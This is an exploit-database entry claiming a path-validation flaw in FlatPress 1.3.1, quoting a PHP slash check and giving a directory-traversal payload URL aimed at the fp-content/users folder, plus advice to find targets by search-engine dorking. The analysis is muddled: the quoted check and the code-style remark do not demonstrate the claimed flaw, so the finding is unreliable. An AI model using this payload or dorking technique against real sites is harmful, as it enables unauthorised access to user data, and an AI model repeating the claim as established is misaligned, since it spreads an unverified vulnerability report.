## https://sploitus.com/exploit?id=PACKETSTORM:180147
=============================================================================================================================================
| # Title : FlatPress 1.3.1 Path Validation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php
if ($fullpath[0] != '/')
trigger_error('config_read: syntax error. Path must begin with a /');
[+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error.
While this is valid, it might be better to use an InvalidArgumentException for more robust error handling.
[+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/
[+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================